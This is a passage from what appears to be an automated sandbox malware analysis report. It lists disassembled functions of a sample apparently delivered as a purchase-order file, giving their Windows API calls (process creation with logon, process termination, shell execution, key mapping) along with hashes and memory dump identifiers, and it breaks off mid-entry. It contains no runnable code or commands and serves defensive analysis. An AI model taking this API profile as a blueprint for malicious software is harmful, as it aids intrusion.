                                • Instruction Fuzzy Hash: BFD15370608601DFC714DF25C480E2ABBE2EFA9714F14895DF8999B261DB31EC85CB92
                                Function 001B175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 001B0FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 001B0FCA
                                  • Part of subcall function 001B0FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 001B0FD6
                                  • Part of subcall function 001B0FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 001B0FE5
                                  • Part of subcall function 001B0FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 001B0FEC
                                  • Part of subcall function 001B0FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 001B1002
                                • GetLengthSid.ADVAPI32(?,00000000,001B1335), ref: 001B17AE
                                • GetProcessHeap.KERNEL32(00000008,00000000), ref: 001B17BA
                                • HeapAlloc.KERNEL32(00000000), ref: 001B17C1
                                • CopySid.ADVAPI32(00000000,00000000,?), ref: 001B17DA
                                • GetProcessHeap.KERNEL32(00000000,00000000,001B1335), ref: 001B17EE
                                • HeapFree.KERNEL32(00000000), ref: 001B17F5
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                • String ID:
                                • API String ID: 3008561057-0
                                • Opcode ID: d529cdcaea8919bbba34e8a3e708cb6df7df20d351e1be0a536e471bcb4253ca
                                • Instruction ID: 9bdba7d5ed79effe2f19decd985b90da71ac4154b65a8dae48d3fded57f53bca
                                • Opcode Fuzzy Hash: d529cdcaea8919bbba34e8a3e708cb6df7df20d351e1be0a536e471bcb4253ca
                                • Instruction Fuzzy Hash: 63118E32610205FFDB14DFA4CC99BEF7BA9EB46355F514018F8419B210DB35A985CBA0
                                Function 001B14CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 001B14FF
                                • OpenProcessToken.ADVAPI32(00000000), ref: 001B1506
                                • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 001B1515
                                • CloseHandle.KERNEL32(00000004), ref: 001B1520
                                • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 001B154F
                                • DestroyEnvironmentBlock.USERENV(00000000), ref: 001B1563
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                • String ID:
                                • API String ID: 1413079979-0
                                • Opcode ID: 13078e0fb678091ec4689d2016869440b71f2c6a7601e65975d610e4f2c178bf
                                • Instruction ID: 9fd0c342ae758b208084461b0f4f77411ebec2354e7fd8ba1775e9e794bc42df
                                • Opcode Fuzzy Hash: 13078e0fb678091ec4689d2016869440b71f2c6a7601e65975d610e4f2c178bf
                                • Instruction Fuzzy Hash: 6C111472504249BBDB11CFA8ED89BDE7BA9EB49744F054025FA05A6060C3758EA19BA0
                                Function 00173382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetLastError.KERNEL32(?,?,00173379,00172FE5), ref: 00173390
                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0017339E
                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 001733B7
                                • SetLastError.KERNEL32(00000000,?,00173379,00172FE5), ref: 00173409
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ErrorLastValue___vcrt_
                                • String ID:
                                • API String ID: 3852720340-0
                                • Opcode ID: b55a5c0d925f17749a36728666d282305d6c6b1ec187900830d63f2cad850031
                                • Instruction ID: 89c7aa992c07e4f2d5d8f5472a7b7dc0ee6c9981b0f26c1bfde835c32abed7be
                                • Opcode Fuzzy Hash: b55a5c0d925f17749a36728666d282305d6c6b1ec187900830d63f2cad850031
                                • Instruction Fuzzy Hash: 5E01FC33649311BFA62927B57CC95A72A75FB29379730C229F538851F0EF114E017654
                                Function 00182D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetLastError.KERNEL32(?,?,00185686,00193CD6,?,00000000,?,00185B6A,?,?,?,?,?,0017E6D1,?,00218A48), ref: 00182D78
                                • _free.LIBCMT ref: 00182DAB
                                • _free.LIBCMT ref: 00182DD3
                                • SetLastError.KERNEL32(00000000,?,?,?,?,0017E6D1,?,00218A48,00000010,00154F4A,?,?,00000000,00193CD6), ref: 00182DE0
                                • SetLastError.KERNEL32(00000000,?,?,?,?,0017E6D1,?,00218A48,00000010,00154F4A,?,?,00000000,00193CD6), ref: 00182DEC
                                • _abort.LIBCMT ref: 00182DF2
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ErrorLast$_free$_abort
                                • String ID:
                                • API String ID: 3160817290-0
                                • Opcode ID: 732914827ea0b020e70616f0097c1712b017bfc59f0676c7a5c677014eec9bed
                                • Instruction ID: 06ce1f5bb1f56df62892971ed08033989545e869672a7a90e9e54b7da99d5976
                                • Opcode Fuzzy Hash: 732914827ea0b020e70616f0097c1712b017bfc59f0676c7a5c677014eec9bed
                                • Instruction Fuzzy Hash: 79F0C83664561037C61337B8BC0AE5F295ABFE27A1F254618F824972D2EF349B425F60
                                Function 001E8A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00169639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00169693
                                  • Part of subcall function 00169639: SelectObject.GDI32(?,00000000), ref: 001696A2
                                  • Part of subcall function 00169639: BeginPath.GDI32(?), ref: 001696B9
                                  • Part of subcall function 00169639: SelectObject.GDI32(?,00000000), ref: 001696E2
                                • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 001E8A4E
                                • LineTo.GDI32(?,00000003,00000000), ref: 001E8A62
                                • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 001E8A70
                                • LineTo.GDI32(?,00000000,00000003), ref: 001E8A80
                                • EndPath.GDI32(?), ref: 001E8A90
                                • StrokePath.GDI32(?), ref: 001E8AA0
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                • String ID:
                                • API String ID: 43455801-0
                                • Opcode ID: 5af7783120f87bfc5e09a2d44b479914eb499d7e4c244e4242c019e68754f018
                                • Instruction ID: eeb7f5a6344fb4375fe8bca76424d5e19332916df040813432f6a0332e282022
                                • Opcode Fuzzy Hash: 5af7783120f87bfc5e09a2d44b479914eb499d7e4c244e4242c019e68754f018
                                • Instruction Fuzzy Hash: 6B11FA7600018CFFDF129F90DC88E9A7F6CEB04354F048021FA199A161C7719D96DFA0
                                Function 001B51FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                Download Yara Rule
                                APIs
                                • GetDC.USER32(00000000), ref: 001B5218
                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 001B5229
                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 001B5230
                                • ReleaseDC.USER32(00000000,00000000), ref: 001B5238
                                • MulDiv.KERNEL32(000009EC,?,00000000), ref: 001B524F
                                • MulDiv.KERNEL32(000009EC,00000001,?), ref: 001B5261
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CapsDevice$Release
                                • String ID:
                                • API String ID: 1035833867-0
                                • Opcode ID: e510246554c4b1418858a633d4e769a26d89ed7a70a0326823cd3c7e72d21dcf
                                • Instruction ID: a92306d1311c1b2ddf1f1949c95f44c5d1bd7ad9d0cfa792bbf260d037287369
                                • Opcode Fuzzy Hash: e510246554c4b1418858a633d4e769a26d89ed7a70a0326823cd3c7e72d21dcf
                                • Instruction Fuzzy Hash: 56014F75A01758BBEB109BE59C89B5EBFB9EB48751F044065FA04AB681D7709801CBA0
                                Function 00151BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                Download Yara Rule
                                APIs
                                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00151BF4
                                • MapVirtualKeyW.USER32(00000010,00000000), ref: 00151BFC
                                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00151C07
                                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00151C12
                                • MapVirtualKeyW.USER32(00000011,00000000), ref: 00151C1A
                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00151C22
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Virtual
                                • String ID:
                                • API String ID: 4278518827-0
                                • Opcode ID: 444314952d53945dd294172417cb2fb18c8b4022d8512ac8f28cdbf4b0f084c4
                                • Instruction ID: 9449716f2269e0a604b0a56bf2ae3351ee80d5c4276e1efa883046dac3c74053
                                • Opcode Fuzzy Hash: 444314952d53945dd294172417cb2fb18c8b4022d8512ac8f28cdbf4b0f084c4
                                • Instruction Fuzzy Hash: 950148B09027597DE3008F5A8C85A56FFA8FF19354F04411B915C4BA41C7B5A864CBE5
                                Function 001BEB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                Download Yara Rule
                                APIs
                                • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 001BEB30
                                • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 001BEB46
                                • GetWindowThreadProcessId.USER32(?,?), ref: 001BEB55
                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001BEB64
                                • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001BEB6E
                                • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001BEB75
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                • String ID:
                                • API String ID: 839392675-0
                                • Opcode ID: 90f1e167e3778356be1f20d07af77b06a633e7c8ffac300ac057b837ddc04efc
                                • Instruction ID: 03cee1823f82090a5c5afe3b0c74c039e346dcc77282acf413ae6adfe08b9561
                                • Opcode Fuzzy Hash: 90f1e167e3778356be1f20d07af77b06a633e7c8ffac300ac057b837ddc04efc
                                • Instruction Fuzzy Hash: E9F03072140198BBE72157929C4DEEF3A7CEFCAB11F000158FA01D5591D7A05A42C6F5
                                Function 001A7439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON
                                Download Yara Rule
                                APIs
                                • GetClientRect.USER32(?), ref: 001A7452
                                • SendMessageW.USER32(?,00001328,00000000,?), ref: 001A7469
                                • GetWindowDC.USER32(?), ref: 001A7475
                                • GetPixel.GDI32(00000000,?,?), ref: 001A7484
                                • ReleaseDC.USER32(?,00000000), ref: 001A7496
                                • GetSysColor.USER32(00000005), ref: 001A74B0
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                • String ID:
                                • API String ID: 272304278-0
                                • Opcode ID: 1dd899051d4d56dabb49643fdd02a47a7a83219362e87867ca21e9a0695880b8
                                • Instruction ID: 21c2492fb191562cf68c09642062bb26093381affaf7d2154fb6c6b33d76eeba
                                • Opcode Fuzzy Hash: 1dd899051d4d56dabb49643fdd02a47a7a83219362e87867ca21e9a0695880b8
                                • Instruction Fuzzy Hash: 9B018B31500255EFDB105FA4DC48BEEBBB6FF48311F110064F926A65A0CB311E92AB90
                                Function 001B1874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                Download Yara Rule
                                APIs
                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001B187F
                                • UnloadUserProfile.USERENV(?,?), ref: 001B188B
                                • CloseHandle.KERNEL32(?), ref: 001B1894
                                • CloseHandle.KERNEL32(?), ref: 001B189C
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 001B18A5
                                • HeapFree.KERNEL32(00000000), ref: 001B18AC
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                • String ID:
                                • API String ID: 146765662-0
                                • Opcode ID: ec06589542ab737535113294c191bfa64577150a24cffe8e71841a4fb023e7e6
                                • Instruction ID: be25b518466eaa1fdf5bf89df514c9f5f956db2d9e383008f828890ecafd2c38
                                • Opcode Fuzzy Hash: ec06589542ab737535113294c191bfa64577150a24cffe8e71841a4fb023e7e6
                                • Instruction Fuzzy Hash: 14E0E536004241FBDB015FE1ED4C90EBF39FF4AB22B108220F62589870CB3294A2DF90
                                Function 0015BBE0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 232COMMON
                                Download Yara Rule
                                APIs
                                • __Init_thread_footer.LIBCMT ref: 0015BEB3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Init_thread_footer
                                • String ID: D%"$D%"$D%"$D%"D%"
                                • API String ID: 1385522511-2824579510
                                • Opcode ID: adda9341f65259f804ef7e67853dc30e166aad948748640bf68615323035af01
                                • Instruction ID: 25f4e7b776448bdbb4891d8ed75c567522f66192cd249da84d1df6a27f3a6db5
                                • Opcode Fuzzy Hash: adda9341f65259f804ef7e67853dc30e166aad948748640bf68615323035af01
                                • Instruction Fuzzy Hash: 85916A75A0820ADFCB18CF98C0D16A9B7F1FF58315F248169E965AB350E731ED89CB90
                                Function 001BC5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00157620: _wcslen.LIBCMT ref: 00157625
                                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 001BC6EE
                                • _wcslen.LIBCMT ref: 001BC735
                                • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 001BC79C
                                • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 001BC7CA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ItemMenu$Info_wcslen$Default
                                • String ID: 0
                                • API String ID: 1227352736-4108050209
                                • Opcode ID: b8dcf905cb1005389141055647ffecb557585f42f1bb42c5db97e0108de04084
                                • Instruction ID: ce6e03d37aafc10d1c07db169108cfe29392bfab8b7c8360c9daa3319b160de5
                                • Opcode Fuzzy Hash: b8dcf905cb1005389141055647ffecb557585f42f1bb42c5db97e0108de04084
                                • Instruction Fuzzy Hash: 6251FF726043019BD714DF68C885BEBB7E8AFA9310F040A2DF9A5D72A0DB70D814CBD2
                                Function 001DAD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                Download Yara Rule
                                APIs
                                • ShellExecuteExW.SHELL32(0000003C), ref: 001DAEA3
                                  • Part of subcall function 00157620: _wcslen.LIBCMT ref: 00157625
                                • GetProcessId.KERNEL32(00000000), ref: 001DAF38
                                • CloseHandle.KERNEL32(00000000), ref: 001DAF67
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CloseExecuteHandleProcessShell_wcslen
                                • String ID: <$@
                                • API String ID: 146682121-1426351568
                                • Opcode ID: ab8a30fcdf9bedc7fc9ec6478eea5f9c74371386fa43d6192cfa5bb3df429988
                                • Instruction ID: d979d4b7092b142707d0d6f89055401a653f01793b977740b9181b5ea0f54bc4
                                • Opcode Fuzzy Hash: ab8a30fcdf9bedc7fc9ec6478eea5f9c74371386fa43d6192cfa5bb3df429988
                                • Instruction Fuzzy Hash: 6F717771A00618DFCB14DFA4D485A9EBBF0BF08301F44849AE866AF392D770ED45CB91
                                Function 001B719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 001B7206
                                • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 001B723C
                                • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 001B724D
                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 001B72CF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ErrorMode$AddressCreateInstanceProc
                                • String ID: DllGetClassObject
                                • API String ID: 753597075-1075368562
                                • Opcode ID: 78e58e9e41c1ba3d7ab008f865c23814530678ffc25eec974ab7e97eae850844
                                • Instruction ID: f7efbdecb95adbb24db153f526c3ba531b84d2f0095e49ae899cdcdc5970d26a
                                • Opcode Fuzzy Hash: 78e58e9e41c1ba3d7ab008f865c23814530678ffc25eec974ab7e97eae850844
                                • Instruction Fuzzy Hash: 0C413171A04204EFDB15CF94C984ADA7BA9EF98310F1580ADFD05DF28AD7B1DA45CBA0
                                Function 001E2F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                                Download Yara Rule
                                APIs
                                • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 001E2F8D
                                • LoadLibraryW.KERNEL32(?), ref: 001E2F94
                                • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 001E2FA9
                                • DestroyWindow.USER32(?), ref: 001E2FB1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: MessageSend$DestroyLibraryLoadWindow
                                • String ID: SysAnimate32
                                • API String ID: 3529120543-1011021900
                                • Opcode ID: 0f189231cb64986254bb52c54fba3cc42cb69864f476434765eacebaa4d637ab
                                • Instruction ID: 220eab493e316ff1c9be479fe09a3f774dc70ef901ddde7ff06ab4797fb5cb11
                                • Opcode Fuzzy Hash: 0f189231cb64986254bb52c54fba3cc42cb69864f476434765eacebaa4d637ab
                                • Instruction Fuzzy Hash: 0E21CD72600685ABEB204FA6DCA1FBF77BDEB69364F100228FA50D7190D771DC9197A0
                                Function 00174D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
